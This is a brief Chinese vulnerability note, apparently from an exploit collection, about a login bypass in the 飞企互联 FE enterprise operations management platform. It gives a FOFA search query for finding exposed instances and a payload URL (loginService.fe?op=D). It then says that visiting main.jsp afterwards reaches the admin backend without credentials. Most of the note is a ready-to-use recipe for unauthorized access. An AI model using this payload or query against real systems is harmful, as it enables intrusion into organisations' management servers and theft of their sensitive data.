F1-7飞企互联-FE企业运营管理平台-PermissionAC

漏洞描述：

飞企互联-FE企业运营管理平台 2.ln、loginService.fe等接口处存在登录绕过漏洞，未授权的攻击者可构造恶意的url访问页面，可直接进入后台管理页面，获取敏感信息，进一步利用可控制整个服务器。

网站图片:

网络测绘:

fofa语法：

FOFA：app=“飞企互联-FE企业运营管理平台”

漏洞复现:

payload：

http://your-ip/loginService.fe?op=D

效果图:

出现这种情况则存在漏洞
随后访问main.jsp页面即可登录后台